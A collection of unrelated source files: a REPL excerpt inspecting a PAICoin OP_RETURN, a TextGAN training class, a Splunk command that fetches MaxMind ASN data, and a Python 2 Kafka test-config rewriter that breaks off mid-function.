b'\x02\x00\x00\x00\x01gn\xda$\x0c\x02\'\x06\xb9_DV\xe1\xd9Lb\xbd\x04\xe6\tx\xa2\x9bp\xa2\xdb\x92\xb1\xa9\xc6\xb9\x98\x01\x00\x00\x00jG0D\x02 \']\x9c\xbc\x8c~\x9aj\xfe\xefY\x85Z\x84\x1b\xb5\xad{\xf1\xa3*\xe1\r\xf3N\x8b\xd1\xbemk\xd5\x7f\x02 G\xae8?\x16s-\x04x\x19#\xcd9\x82\x8d\x15\xb1\xfe\xe7\x05\xffQ\xe74\'\xda3.\x91\x92\\\xa8\x01!\x02\x95\x05\xd7K\xb0b0s[\\p\xdb\xb6\x9aU\xea\x1e\xaf\x13\n>h\xf6N\xb6|\xf8LV\x16\xb1(\xff\xff\xff\xff\x03\x80\x96\x98\x00\x00\x00\x00\x00\x19v\xa9\x14\x03\xd6\x12"\xe9]\x0fK\xc6{\xf4 \x8b\xc2 \xc8\xa0\xae\xf2\xf4\x88\xac<`^\x05\x00\x00\x00\x00\x19v\xa9\x14\x01(\xd7"\xae\x9fu\x8e\x87\xc0\xde-K\xa6r\x98\x80\x0c\x9b`\x88\xac\x00\x00\x00\x00\x00\x00\x00\x006j4\x92\x10\xff\xff\xff\xff\xff\xff\x00\xff \x840 i\xb9\xb28*\xd0\np\xc9H\xdb.\x95\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-10:
... ]
b'\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-32:]
b'\xdb.\x95\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-52:]
b'\xff\xff\xff\xff\x00\xff \x840 i\xb9\xb28*\xd0\np\xc9H\xdb.\x95\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-56:]
b'\x92\x10\xff\xff\xff\xff\xff\xff\x00\xff \x840 i\xb9\xb28*\xd0\np\xc9H\xdb.\x95\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xc0\xa2\xb6I\x00\x00\x00\x00'
>>> op_return[-56:].hex()
'9210ffffffffffff00ff2084302069b9b2382ad00a70c948db2e95000000000000000000000000000000000400000000c0a2b64900000000'
'''
paicoin_verif_mainnet2()
|
# -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : instructor.py
# @Time : Created at 2019-04-25
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
import numpy as np
import torch
import torch.nn as nn
import config as cfg
from metrics.bleu import BLEU
from metrics.clas_acc import ACC
from metrics.nll import NLL
from metrics.ppl import PPL
from utils.cat_data_loader import CatClasDataIter
from utils.data_loader import GenDataIter
from utils.helpers import Signal, create_logger, get_fixed_temperature
from utils.text_process import load_dict, write_tokens, tensor_to_tokens
import torch.nn.functional as F
class BasicInstructor:
def __init__(self, opt):
self.log = create_logger(__name__, silent=False, to_disk=True,
log_file=cfg.log_filename if cfg.if_test
else [cfg.log_filename, cfg.save_root + 'log.txt'])
self.sig = Signal(cfg.signal_file)
self.opt = opt
self.show_config()
self.clas = None
# load dictionary
self.word2idx_dict, self.idx2word_dict = load_dict(cfg.dataset)
# print("start self.train_data")
# Dataloader
try:
self.train_data = GenDataIter(cfg.train_data)
# print("finish self.train_data")
# by , add the if_context for later update!
self.test_data = GenDataIter(cfg.test_data, if_test_data=True, if_context=cfg.if_context)
# print("finish self.test_data")
except RuntimeError:
print("error in the self.train_data and self.test_data building")
pass
try:
self.train_data_list = [GenDataIter(cfg.cat_train_data.format(i)) for i in range(cfg.k_label)]
self.test_data_list = [GenDataIter(cfg.cat_test_data.format(i), if_test_data=True) for i in
range(cfg.k_label)]
self.clas_data_list = [GenDataIter(cfg.cat_test_data.format(str(i)), if_test_data=True) for i in
range(cfg.k_label)]
self.train_samples_list = [self.train_data_list[i].target for i in range(cfg.k_label)]
self.clas_samples_list = [self.clas_data_list[i].target for i in range(cfg.k_label)]
except:
pass
# Criterion
self.mle_criterion = nn.NLLLoss()
self.dis_criterion = nn.CrossEntropyLoss()
self.clas_criterion = nn.CrossEntropyLoss()
# Optimizer
self.clas_opt = None
# Metrics
self.bleu = BLEU('BLEU', gram=[2, 3, 4, 5], if_use=cfg.use_bleu)
self.nll_gen = NLL('NLL_gen', if_use=cfg.use_nll_gen, gpu=cfg.CUDA)
self.nll_div = NLL('NLL_div', if_use=cfg.use_nll_div, gpu=cfg.CUDA)
self.self_bleu = BLEU('Self-BLEU', gram=[2, 3, 4], if_use=cfg.use_self_bleu)
self.clas_acc = ACC(if_use=cfg.use_clas_acc)
self.ppl = PPL(self.train_data, self.test_data, n_gram=5, if_use=cfg.use_ppl)
self.all_metrics = [self.bleu, self.nll_gen, self.nll_div, self.self_bleu, self.ppl]
def _run(self):
print('Nothing to run in Basic Instructor!')
pass
def _test(self):
pass
def init_model(self):
if cfg.dis_pretrain:
self.log.info(
'Load pre-trained discriminator: {}'.format(cfg.pretrained_dis_path))
self.dis.load_state_dict(torch.load(cfg.pretrained_dis_path, map_location='cuda:{}'.format(cfg.device)))
# revised by
# if cfg.gen_pretrain: previous
if cfg.if_use_saved_gen:
            # comment out (not cfg.if_pretrain_mle) since sometimes we want to continue training!
self.log.info('Load MLE pre-trained generator: {}'.format(cfg.pretrained_gen_path_used))
if cfg.device == torch.device("cpu"):
self.gen.load_state_dict(torch.load(cfg.pretrained_gen_path_used))
else:
self.gen.load_state_dict(torch.load(cfg.pretrained_gen_path_used, map_location='cuda:{}'.format(cfg.device)))
if cfg.CUDA:
self.gen = self.gen.cuda()
self.dis = self.dis.cuda()
@staticmethod
def compute_hiddens(model, seqs, if_detach=True, if_list2tensor_quick_computation=False):
if isinstance(seqs, list):
            # debug setting: we have to ensure there is more than one seq in seqs
if if_list2tensor_quick_computation and len(seqs) > 1:
# ==== condition 0 ====: from list input, where in the seq-context-one-long setting, we pad the different seq and train it
# previously, we set: 1+; but, after thinking, we should omit it and set our own plans: be careful of it and set it well! --- be careful!
seq_max_len = max([len (i) for i in seqs]) # list of m(length_of_one_long_seq) or m*vocab if linear embedding and get m
# torch.ones --> torch.float32, we should use long to get the required dtype
padded_front_idx = [(torch.ones(seq_max_len - len(i))*cfg.padding_idx).long().to(cfg.device) for i in seqs]
if cfg.if_linear_embedding:
padded_front_idx = [F.one_hot(one_seq, cfg.extend_vocab_size).float() for one_seq in
padded_front_idx] # [54,vocab_size]-<[54]
# unsqueeze to add the 1*batch dimension for the concatenation!
padded_seqs = [torch.cat([padded_front_idx[i], seqs[i]], dim=0).unsqueeze(0) for i in range(len(seqs))]
seqs = torch.cat(padded_seqs, dim=0)
# repeat the torch processing
batch_size = seqs.shape[0]
hidden = model.init_hidden(batch_size) # batch_size*1*512
# print(seqs.shape, hidden.shape)
_, hiddens = model.forward(seqs, hidden, need_hidden=True)
else:
# ===== condition 1 ====: from list input, we do not pad, and train it one by one
hiddens = []
for seq in seqs:
# seq shape, when linear embedding with one-hot, dimension is origina-seq-len*vocab_size * [545, 26685]
# seq shape, when default embedding without one-hot, dim share is [545]
batch_size = 1 # seq_one_long.shape[0], it should be (1*dynamic-edits)
hidden = model.init_hidden(batch_size) # 1, 1, 512
                # print(seq.view(batch_size, -1).shape) # shape: 1, 545 # previously we used seq = seq.view()
# set it when we have the stance training with only one post: 1*max_seq_len*vocab
if seq.shape[0] == 1:
seq_unsqueezed = seq
else:
seq_unsqueezed = seq.unsqueeze(0) # a universal solution for the w/ and w/o conditions for batch=1 # (1, a) from [a] or (1, a, b) from (a, b): linear embed
_, hidden = model.forward(seq_unsqueezed, hidden, need_hidden=True)
# if if_detach:
# hiddens.append(hidden.detach())
# else:
# hiddens.append(hidden)
hiddens.append(hidden)
hiddens = torch.cat(hiddens, dim=0) # batch_size*hidden_state
else:
# ==== condition 2 ====: directly compute from the tensor
assert isinstance(seqs, torch.Tensor) == True # shape: num_edit*max_len*vocab_size
batch_size = seqs.shape[0]
hidden = model.init_hidden(batch_size) # batch_size*1*hidden_dimension
_, hiddens = model.forward(seqs, hidden, need_hidden=True) # batch_size*1*hidden_dimension
if if_detach:
return hiddens.detach()
else:
return hiddens
def train_gen_epoch(self, model, data_loader, criterion, optimizer, compute_hidden=False, if_list2tensor_quick_computation=False,
if_relevancy_attention_aware_context = False,
if_one_hot_in_one_batch_in_malcom_exp = False
):
"""
:param model:
:param data_loader:
:param criterion:
:param optimizer:
:param compute_hidden:
        :param if_list2tensor_quick_computation: when seqs have different lengths, pad them to a common length and process them as one tensor
:return:
"""
total_loss = 0
num_batches = 0
# ==== condition 0 ====: we compute the hidden from previous one long tensor
if compute_hidden and not if_relevancy_attention_aware_context:
for index in range(0, len(data_loader), cfg.batch_size):
# print(index)
# ensure the valid indexing
if (index + cfg.batch_size) <= len(data_loader):
num_batches += 1
one_data_batch = data_loader[index: index+cfg.batch_size]
# present 2: more universal solution
if if_one_hot_in_one_batch_in_malcom_exp:
# F.one_hot(i, cfg.extend_vocab_size).float()
inp = torch.cat([F.one_hot(one_dict['input'], cfg.extend_vocab_size).float().unsqueeze(0) for one_dict in one_data_batch], dim=0)
one_long_context = [F.one_hot(one_dict['one_long_context'], cfg.extend_vocab_size).float() for one_dict in one_data_batch]
else:
inp = torch.cat([one_dict['input'].unsqueeze(0) for one_dict in one_data_batch], dim=0)
one_long_context = [one_dict['one_long_context'] for one_dict in one_data_batch]
target = torch.cat([one_dict['target'].view(1, -1) for one_dict in one_data_batch], dim=0)
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
# ==== compute the hiddens ====:
# every seq should already be on device
hidden = self.compute_hiddens(model, one_long_context, if_list2tensor_quick_computation=if_list2tensor_quick_computation) # batch_size*1*hidden
# ==== end ====
# by checking, the forward comes from the basic relational_rnn_general generator setting!
# print(inp.shape, hidden.shape) # batch_size*seq_len*[vocab_sizeInLinearEmbedding]
pred = model.forward(inp, hidden) # (seq_len*batch)*vocab_size
# print(inp.shape, hidden.shape, target.shape, pred.shape)
# target.view(-1) shape: (batch_size*max_len_seq)
loss = criterion(pred, target.view(-1))
# self.log.info(f"one loss in the inner train_gen_epoch mle training is {loss}") # tested pass, we can get the loss
self.optimize(optimizer, loss, model)
total_loss += loss
# self.log.info("finish one dataloader in pretraining generator")
        # ==== condition 1 ====: we do not use the context hidden state, the same as the relgan paper
elif not compute_hidden and not if_relevancy_attention_aware_context:
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target'] # batch_size*max_len_seq
assert 'one_long_context' not in data
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
hidden = model.init_hidden(data_loader.batch_size) # batch_size*1*hidden_state
# by checking, the forward comes from the basic relational_rnn_general generator setting!
pred = model.forward(inp, hidden) # (seq_len*batch)*vocab_size
# print(inp.shape, hidden.shape, target.shape, pred.shape)
# target.view(-1) shape: (batch_size*max_len_seq)
loss = criterion(pred, target.view(-1))
# print("get the loss")
# exit(0)
self.optimize(optimizer, loss, model)
total_loss += loss
# self.log.info("finish one dataloader in pretraining generator")
# ==== condition 2 ====: we compute the attention-aware context
elif if_relevancy_attention_aware_context:
for index in range(0, len(data_loader), cfg.batch_size):
# ensure the valid indexing
if (index + cfg.batch_size) <= len(data_loader):
num_batches += 1
one_data_batch = data_loader[index: index+cfg.batch_size]
inp = torch.cat([one_dict['input'].unsqueeze(0) for one_dict in one_data_batch], dim=0) # batch_size*max_seq_len*[vocab_size]
target = torch.cat([one_dict['target'].view(1, -1) for one_dict in one_data_batch], dim=0) # batch_size*max_seq_len
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
prev_train_seq = [one_dict['prev_train_seq'] for one_dict in one_data_batch] # batch_size length list of tensor: (num_edit-1)*max_seq_len
matched_context = [one_dict['matched_context'] for one_dict in
one_data_batch] # batch_size length list of tensor: 1*max_seq_len
match_relevancy_score = [one_dict['match_relevancy_score'] for one_dict in
one_data_batch] # batch_size length list of tensor: 1*(num_edit-1)
weighted_hiddens = self.weighted_context_computation(model, prev_train_seq, matched_context, match_relevancy_score)
# context_aware generation: # batch_size * seq-len * (hidden_dim)
pred = model.forward(inp, weighted_hiddens, context=weighted_hiddens.repeat(1, cfg.max_seq_len, 1))
loss = criterion(pred, target.view(-1))
self.optimize(optimizer, loss, model)
total_loss += loss
else:
self.log.info("**** no correct settting for training generator and exit ****")
return total_loss / len(data_loader)
def weighted_context_computation(self, model, prev_train_seq, matched_context, match_relevancy_score):
"""
we compute the attention-aware weighted sum for the testing!
:param model:
:param prev_train_seq:
:param matched_context:
:param match_relevancy_score:
:return:
"""
matched_prev_train_seq_and_context = [torch.cat([prev_train_seq[i], matched_context[i]], dim=0) for i in
range(len(prev_train_seq))] # batch_size list of tensor: num_edit*max_seq
matched_attention_score = [torch.cat([one_relevancy_score.view(1, -1), torch.ones(1, 1).to(cfg.device)], dim=1)
for one_relevancy_score in match_relevancy_score] # batch_size list: 1*(num_edit)
weighted_hiddens = [] # batch_size list of: 1*hidden
for i in range(len(matched_prev_train_seq_and_context)):
one_prev_train_seq_and_context = matched_prev_train_seq_and_context[i] # num_edit*max_seq*[vocab_size]
seq_hiddens = self.compute_hiddens(model, one_prev_train_seq_and_context).squeeze(1) # num_edit*1*hidden_dimension->num_edit*hidden_state
one_full_attention_score = matched_attention_score[i] # 1*(num_edit)
attention_weights = F.softmax(one_full_attention_score, dim=1) # 1*(num_edit)
weighted_hidden_state = torch.matmul(attention_weights, seq_hiddens) # 1*hidden_state
weighted_hiddens.append(weighted_hidden_state)
weighted_hiddens = torch.cat([one_hidden.unsqueeze(0) for one_hidden in weighted_hiddens],
dim=0) # batch_size*1*hidden
return weighted_hiddens
def train_dis_epoch(self, model, data_loader, criterion, optimizer):
total_loss = 0
total_acc = 0
total_num = 0
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
pred = model.forward(inp)
loss = criterion(pred, target)
self.optimize(optimizer, loss, model)
total_loss += loss.item()
total_acc += torch.sum((pred.argmax(dim=-1) == target)).item()
total_num += inp.size(0)
total_loss /= len(data_loader)
total_acc /= total_num
return total_loss, total_acc
def train_classifier(self, epochs):
"""
Classifier for calculating the classification accuracy metric of category text generation.
Note: the train and test data for the classifier is opposite to the generator.
Because the classifier is to calculate the classification accuracy of the generated samples
where are trained on self.train_samples_list.
Since there's no test data in synthetic data (oracle data), the synthetic data experiments
doesn't need a classifier.
"""
import copy
# Prepare data for Classifier
clas_data = CatClasDataIter(self.clas_samples_list)
eval_clas_data = CatClasDataIter(self.train_samples_list)
max_acc = 0
best_clas = None
for epoch in range(epochs):
c_loss, c_acc = self.train_dis_epoch(self.clas, clas_data.loader, self.clas_criterion,
self.clas_opt)
_, eval_acc = self.eval_dis(self.clas, eval_clas_data.loader, self.clas_criterion)
if eval_acc > max_acc:
best_clas = copy.deepcopy(self.clas.state_dict()) # save the best classifier
max_acc = eval_acc
self.log.info('[PRE-CLAS] epoch %d: c_loss = %.4f, c_acc = %.4f, eval_acc = %.4f, max_eval_acc = %.4f',
epoch, c_loss, c_acc, eval_acc, max_acc)
self.clas.load_state_dict(copy.deepcopy(best_clas)) # Reload the best classifier
@staticmethod
def eval_dis(model, data_loader, criterion):
total_loss = 0
total_acc = 0
total_num = 0
with torch.no_grad():
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
pred = model.forward(inp)
loss = criterion(pred, target)
total_loss += loss.item()
total_acc += torch.sum((pred.argmax(dim=-1) == target)).item()
total_num += inp.size(0)
total_loss /= len(data_loader)
total_acc /= total_num
return total_loss, total_acc
@staticmethod
def optimize_multi(opts, losses):
for i, (opt, loss) in enumerate(zip(opts, losses)):
opt.zero_grad()
loss.backward(retain_graph=True if i < len(opts) - 1 else False)
opt.step()
@staticmethod
def optimize(opt, loss, model=None, retain_graph=False):
opt.zero_grad()
loss.backward(retain_graph=retain_graph)
if model is not None:
torch.nn.utils.clip_grad_norm_(model.parameters(), cfg.clip_norm)
opt.step()
def show_config(self):
self.log.info(100 * '=')
self.log.info('> training arguments:')
for arg in vars(self.opt):
self.log.info('>>> {0}: {1}'.format(arg, getattr(self.opt, arg)))
self.log.info(100 * '=')
def cal_metrics(self, fmt_str=False, dictionary = None, eval_samples=None):
"""
Calculate metrics
:param fmt_str: if return format string for logging
"""
# print(f"in the call mestric, the original dictionary size is {len(self.idx2word_dict)}")
if dictionary == None:
dictionary = self.idx2word_dict
# print(f"in the call mestric, the dictionary size is {len(dictionary)}")
else:
# print("use the new dictionay in the cal_metrics computation")
# print(f"in the call mestric, the dictionary size is {len(dictionary)}")
pass
with torch.no_grad():
# Prepare data for evaluation
# added by : get it from random setting or the variable transfer!
if eval_samples is None:
eval_samples = self.gen.sample(cfg.samples_num, 4 * cfg.batch_size)
# not sure why 200, 200 in this case
gen_tokens_s = tensor_to_tokens(self.gen.sample(200, 200), dictionary)
else:
gen_tokens_s = tensor_to_tokens(eval_samples, dictionary)
gen_data = GenDataIter(eval_samples)
gen_tokens = tensor_to_tokens(eval_samples, dictionary)
# Reset metrics
self.bleu.reset(test_text=gen_tokens, real_text=self.test_data.tokens)
self.nll_gen.reset(self.gen, self.train_data.loader)
self.nll_div.reset(self.gen, gen_data.loader)
self.self_bleu.reset(test_text=gen_tokens_s, real_text=gen_tokens)
self.ppl.reset(gen_tokens)
if fmt_str:
return ', '.join(['%s = %s' % (metric.get_name(), metric.get_score()) for metric in self.all_metrics])
else:
return [metric.get_score() for metric in self.all_metrics]
def cal_metrics_with_label(self, label_i):
assert type(label_i) == int, 'missing label'
with torch.no_grad():
# Prepare data for evaluation
eval_samples = self.gen.sample(cfg.samples_num, 8 * cfg.batch_size, label_i=label_i)
gen_data = GenDataIter(eval_samples)
gen_tokens = tensor_to_tokens(eval_samples, self.idx2word_dict)
gen_tokens_s = tensor_to_tokens(self.gen.sample(200, 200, label_i=label_i), self.idx2word_dict)
clas_data = CatClasDataIter([eval_samples], label_i)
# Reset metrics
self.bleu.reset(test_text=gen_tokens, real_text=self.test_data_list[label_i].tokens)
self.nll_gen.reset(self.gen, self.train_data_list[label_i].loader, label_i)
self.nll_div.reset(self.gen, gen_data.loader, label_i)
self.self_bleu.reset(test_text=gen_tokens_s, real_text=gen_tokens)
self.clas_acc.reset(self.clas, clas_data.loader)
self.ppl.reset(gen_tokens)
return [metric.get_score() for metric in self.all_metrics]
def comb_metrics(self, fmt_str=False):
all_scores = [self.cal_metrics_with_label(label_i) for label_i in range(cfg.k_label)]
all_scores = np.array(all_scores).T.tolist() # each row for each metric
if fmt_str:
return ', '.join(['%s = %s' % (metric.get_name(), score)
for (metric, score) in zip(self.all_metrics, all_scores)])
return all_scores
def _save(self, phase, epoch, dictionary=None, prev_hiddens=None):
"""Save model state dict and generator's samples"""
if phase != 'ADV':
torch.save(self.gen.state_dict(), cfg.save_model_root + 'gen_{}_{:05d}.pt'.format(phase, epoch))
if dictionary is None:
dictionary = self.idx2word_dict
else:
pass
save_sample_path = cfg.save_samples_root + 'samples_{}_{:05d}.txt'.format(phase, epoch)
if prev_hiddens is None:
samples = self.gen.sample(cfg.batch_size, cfg.batch_size)
else:
samples = self.gen.sample(cfg.batch_size, cfg.batch_size,
hidden=prev_hiddens) # batch_size*max_len_sent*vocab_size
write_tokens(save_sample_path, tensor_to_tokens(samples, dictionary))
def update_temperature(self, i, N):
self.gen.temperature.data = torch.Tensor([get_fixed_temperature(cfg.temperature, i, N, cfg.temp_adpt)])
if cfg.CUDA:
self.gen.temperature.data = self.gen.temperature.data.cuda()
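# --- A minimal, self-contained sketch (toy shapes and scores, not the trainer's real
# --- data) of the attention weighting used in weighted_context_computation() above:
# --- relevancy scores are softmax-normalized and used to average the per-edit hidden
# --- states into a single 1*hidden context vector.
if __name__ == "__main__":
    import torch
    import torch.nn.functional as F

    num_edit, hidden_dim = 4, 8
    seq_hiddens = torch.randn(num_edit, hidden_dim)                       # num_edit * hidden_state
    relevancy_scores = torch.tensor([[0.2, 0.9, 0.1, 1.0]])               # 1 * num_edit
    attention_weights = F.softmax(relevancy_scores, dim=1)                # 1 * num_edit, sums to 1
    weighted_hidden_state = torch.matmul(attention_weights, seq_hiddens)  # 1 * hidden_state
    print(weighted_hidden_state.shape)                                    # torch.Size([1, 8])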
|
#!/usr/bin/env python
from splunklib.searchcommands import dispatch, GeneratingCommand, Configuration, Option, validators
import sys
import os
try:
# python2
import ConfigParser as configparser
from StringIO import StringIO as BytesIO
import urllib2 as urllib_functions
except ImportError:
# python3
import configparser
from io import BytesIO
import urllib.request as urllib_functions
from zipfile import ZipFile
import re
import socket
import struct
@Configuration(type='reporting')
class ASNGenCommand(GeneratingCommand):
def generate(self):
proxies = {'http': None, 'https': None}
maxmind = {'license_key': None}
try:
config = configparser.ConfigParser()
# first try to read the defaults (in case we are in a cluster with deployed config)
config.read(os.path.join(os.getcwd(), '../default/asngen.conf'))
# then try to read the overrides
config.read(os.path.join(os.getcwd(), '../local/asngen.conf'))
if config.has_section('proxies'):
if config.has_option('proxies', 'https'):
if len(config.get('proxies', 'https')) > 0:
proxies['https'] = config.get('proxies', 'https')
if config.has_section('maxmind'):
if config.has_option('maxmind', 'license_key'):
if len(config.get('maxmind', 'license_key')) > 0:
maxmind['license_key'] = config.get('maxmind', 'license_key')
except:
raise Exception("Error reading configuration. Please check your local asngen.conf file.")
if proxies['https'] is not None:
proxy = urllib_functions.ProxyHandler(proxies)
opener = urllib_functions.build_opener(proxy)
urllib_functions.install_opener(opener)
if maxmind['license_key'] is None:
raise Exception("maxmind license_key is required")
try:
link = "https://download.maxmind.com/app/geoip_download" + "?"
link += "edition_id=GeoLite2-ASN-CSV" + "&"
link += "license_key=" + maxmind['license_key'] + "&"
link += "suffix=zip"
url = urllib_functions.urlopen(link)
except:
raise Exception("Please check app proxy settings and license_key.")
if url.getcode()==200:
try:
zipfile = ZipFile(BytesIO(url.read()))
except:
raise Exception("Invalid zip file")
else:
raise Exception("Received response: " + url.getcode())
for name in zipfile.namelist():
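# Each extracted CSV row is expected to look roughly like
# 1.0.0.0/24,13335,"EXAMPLE-AS-NAME" (network, prefix length, ASN, AS name);
# the regex below captures those four fields so the cidr, asn and name can be yielded.
# (Comment added for clarity; the concrete values come from the downloaded GeoLite2 data.)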
entries = re.findall(br'^(\d+\.\d+\.\d+\.\d+)/(\d+),(\d+),"?([^"\n]+)"?', zipfile.open(name).read(), re.MULTILINE)
for line in entries:
yield {
'ip': line[0].decode('utf-8', 'ignore') + "/" +
line[1].decode('utf-8', 'ignore'),
'asn': line[2].decode('utf-8', 'ignore'),
'autonomous_system': line[3].decode('utf-8', 'ignore')}
dispatch(ASNGenCommand, sys.argv, sys.stdin, sys.stdout, __name__)
|
#!/usr/bin/python
import sys
import json
import os
import fnmatch
import collections
import fileinput
import re
# Settings loaded from cluster.properties file
brokers = []
brokers_target = []
zookeepers = []
zookeepers_target = []
producers = []
consumers = []
consumers_target = []
mirrormakers = []
javaHome = ""
kafkaHome = ""
zkPort = ""
secure = False
def find_files(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
def fix_cluster_config_files(directory):
for f in find_files("cluster_config.json", directory):
print "Processing " + f
inFile = open(f, "r")
data = json.load(inFile, object_pairs_hook=collections.OrderedDict)
inFile.close()
brokerIndx = 0
t_brokerIndx = 0
producerIndx = 0
consumerIndx = 0
t_consumerIndx = 0
mirrormakerIndx = 0
zkIndx = 0
t_zkIndx = 0
for entity in data["cluster_config"]:
if entity["role"] == "broker" and len(brokers)>0:
if "cluster_name" not in entity or entity["cluster_name"] == "source":
entity["hostname"] = brokers[brokerIndx]
brokerIndx = brokerIndx+1 if brokerIndx+1<len(brokers) else 0
elif entity["cluster_name"] == "target":
entity["hostname"] = brokers_target[t_brokerIndx]
t_brokerIndx = t_brokerIndx+1 if t_brokerIndx+1<len(brokers_target) else 0
else:
print "*** UNEXPECTED broker entity: %s" % entity
elif entity["role"] == "zookeeper" and len(zookeepers)>0:
if "cluster_name" not in entity or entity["cluster_name"] == "source":
entity["hostname"] = zookeepers[zkIndx]
zkIndx = zkIndx+1 if zkIndx+1<len(zookeepers) else 0
elif entity["cluster_name"] == "target":
entity["hostname"] = zookeepers_target[t_zkIndx]
t_zkIndx = t_zkIndx+1 if t_zkIndx+1<len(zookeepers_target) else 0
else:
print "*** UNEXPECTED ZK entity: %s" % entity
elif entity["role"] == "producer_performance" and len(producers)>0:
if "cluster_name" not in entity or entity["cluster_name"] == "source":
entity["hostname"] = producers[producerIndx]
producerIndx = producerIndx+1 if producerIndx+1<len(producers) else 0
elif entity["cluster_name"] == "target":
print "*** UNEXPECTED Target Producer: %s" % entity
elif entity["role"] == "console_consumer" and len(consumers)>0:
if "cluster_name" not in entity or entity["cluster_name"] == "source":
entity["hostname"] = consumers[consumerIndx]
consumerIndx = consumerIndx+1 if consumerIndx+1<len(consumers) else 0
elif entity["cluster_name"] == "target":
entity["hostname"] = consumers_target[t_consumerIndx]
t_consumerIndx = t_consumerIndx+1 if t_consumerIndx+1<len(consumers_target) else 0
else:
print "*** UNEXPECTED Consumer entity: %s" % entity
elif entity["role"] == "mirror_maker" and len(mirrormakers)>0:
entity["hostname"] = mirrormakers[mirrormakerIndx]
mirrormakerIndx = mirrormakerIndx+1 if mirrormakerIndx+1<len(mirrormakers) else 0
if "java_home" in entity and javaHome!="":
entity["java_home"] = javaHome
if "kafka_home" in entity and kafkaHome!="":
entity["kafka_home"] = kafkaHome
outFile = open(f, "w+")
outFile.write( json.dumps(data, indent=4, separators=(',', ': ')) )
outFile.close()
def fix_json_properties_files(directory):
for f in find_files("testcase_*_properties.json", directory):
print "Processing " + f
inFile = open(f, "r")
data = json.load(inFile, object_pairs_hook=collections.OrderedDict)
inFile.close()
changed = False
for entity in data["entities"]:
if "zookeeper" in entity:
entity["zookeeper"] = zookeepers[0] + ":" + zkPort
changed = True
if changed:
outFile = open(f, "w+")
outFile.write( json.dumps(data, indent=4, separators=(',', ': ')) )
outFile.close()
def fix_other_properties_file(directory):
if len(zookeepers) == 0:
return
for f in find_files("*.properties", directory):
print "Processing " + f
fname = os.path.basename(f)
if fname == "mirror_consumer.properties":
os.popen("perl -i -pe 's/zookeeper.connect=.*/zookeeper.connect=" + zookeepers_target[0] + "/' " + f).read()
elif fname == "mirror_producer.properties":
os.popen("perl -i -pe 's/metadata.broker.list=.*/metadata.broker.list=" + ",".join(brokers) + "/' " + f ).read()
print os.popen("perl -i -pe 's/bootstrap.servers=.*/bootstrap.servers=" + ",".join(brokers) + "/' " + f ).read()
else:
os.popen("perl -i -pe 's/zookeeper.connect=localhost:.*/zookeeper.connect=" + zookeepers[0] + ":" + zkPort + "/' " + f).read()
os.popen("perl -i -pe 's/zk.connect=localhost:.*/zk.connect=" + zookeepers[0] + ":" + zkPort + "/' " + f).read()
if re.search("zookeeper.*properties", fname):
# print os.popen("perl -i -pe 's/server.1=localhost/server.1=" + zookeepers[0] + "/' " + f).read()
if secure:
with open(f, "a") as zkConf:
zkConf.write("\nauthProvider.1=org.apache.zookeeper.server.auth.SASLAuthenticationProvider")
zkConf.write("\njaasLoginRenew=3600000")
zkConf.write("\nkerberos.removeHostFromPrincipal=true")
zkConf.write("\nkerberos.removeRealmFromPrincipal=true\n")
if secure and fname == "server.properties":
with open(f, "a") as brokerconf:
brokerconf.write("\nsuper.users=User:kafka")
brokerconf.write("\nprincipal.to.local.class=kafka.security.auth.KerberosPrincipalToLocal")
brokerconf.write("\nauthorizer.class.name=kafka.security.auth.SimpleAclAuthorizer")
brokerconf.write("\nsecurity.inter.broker.protocol=SASL_PLAINTEXT\n")
if secure and (fname == "producer.properties" or fname == "producer_performance.properties" or fname == "consumer.properties"):
with open(f, "a") as producerconf:
producerconf.write("\nsecurity.protocol=SASL_PLAINTEXT\n")
def loadClusterProperties(clusterProp):
inFile = open(clusterProp, "r")
data = json.load(inFile)
inFile.close()
global kafkaHome, javaHome, zkPort, zookeepers, producers, consumers, brokers, secure
if not "zookeepers" in data:
print >> sys.stderr, "'zookeepers' list not specified"
else:
for zk in data["zookeepers"]:
zookeepers.append(zk)
if not "zookeepers_target" in data:
print >> sys.stderr, "'zookeepers_target' list not specified"
else:
for zk in data["zookeepers_target"]:
zookeepers_target.append(zk)
if not "brokers" in data:
print >> sys.stderr, "'brokers' list not specified"
else:
for b in data["brokers"]:
brokers.append(b)
if not "brokers_target" in data:
print >> sys.stderr, "'brokers_target' list not specified"
else:
for b in data["brokers_target"]:
brokers_target.append(b)
if not "producers" in data:
print >> sys.stderr, "'producers' list not specified"
else:
for p in data["producers"]:
producers.append(p)
if not "mirrormakers" in data:
print >> sys.stderr, "'mirrormakers' list not specified"
else:
for m in data["mirrormakers"]:
mirrormakers.append(m)
if not "zkPort" in data:
print >> sys.stderr, "'zkPort' not specified"
else:
zkPort = data["zkPort"]
if not "consumers" in data:
print >> sys.stderr, "'consumers' list not specified"
else:
for c in data["consumers"]:
consumers.append(c)
if not "consumers_target" in data:
print >> sys.stderr, "'consumers_target' list not specified"
else:
for c in data["consumers_target"]:
consumers_target.append(c)
if not "javaHome" in data:
print >> sys.stderr, "'javaHome' not specified"
else:
javaHome = data["javaHome"]
if not "kafkaHome" in data:
